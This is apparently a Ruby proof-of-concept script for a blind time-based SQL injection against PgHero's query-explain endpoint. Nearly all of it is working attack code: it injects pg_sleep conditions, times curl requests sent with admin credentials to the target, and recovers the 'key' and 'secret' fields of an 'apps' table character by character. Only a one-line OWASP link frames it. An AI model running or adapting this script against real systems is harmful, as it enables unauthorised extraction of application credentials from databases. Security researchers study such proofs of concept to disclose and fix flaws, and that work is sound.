Blind time-based SQL injection attack, proof of concept (with PgHero)

blind-sql-time-based-attack.rb

# More information available at https://www.owasp.org/index.php/Blind_SQL_Injection
POSITIVE_DELAY = 2

CHARS = ('A'..'Z').to_a + ('a'..'z').to_a + ('0'..'9').to_a

def query(table, field, id, char, pos)
  %Q[SELECT CASE WHEN substr(#{field}, #{pos}, 1) = \'#{char}\' THEN pg_sleep(#{POSITIVE_DELAY}) ELSE NULL END FROM #{table} WHERE id = #{id} ;]
end

def timeit
  t0 = Time.now
  yield
  Time.now - t0
end

def sql_test(table, field, id, char, pos)
  cmd = %Q[psql mydatabase -c "#{query(table, field, id, char, pos)}"]
  timeit { `#{ cmd }` } > POSITIVE_DELAY
end

def curl_test(table, field, id, char, pos)
  cmd = <<-CMD.gsub("\n", ' ')
    curl --silent -d "query=#{query(table, field, id, char, pos)}" -d "commit=Analyze"
      --user admin:password
      https://myhost.com/pghero/explain
  CMD
  timeit { `#{ cmd }` } > POSITIVE_DELAY
end

def retrieve_field(table, field, id)
  buffer = ""
  (1..255).each do |pos|
    found = false
    CHARS.each do |char|
      if curl_test(table, field, id, char, pos)
        puts "#{pos}: #{char}"
        buffer << char
        found = true
        break # once a match is found, move on
      end
    end
    break unless found # if nothing matched, treat as end of string
  end
  buffer
end

key = retrieve_field('apps', 'key', 1)
puts "key: #{key}"

secret = retrieve_field('apps', 'secret', 1)
puts "secret: #{secret}"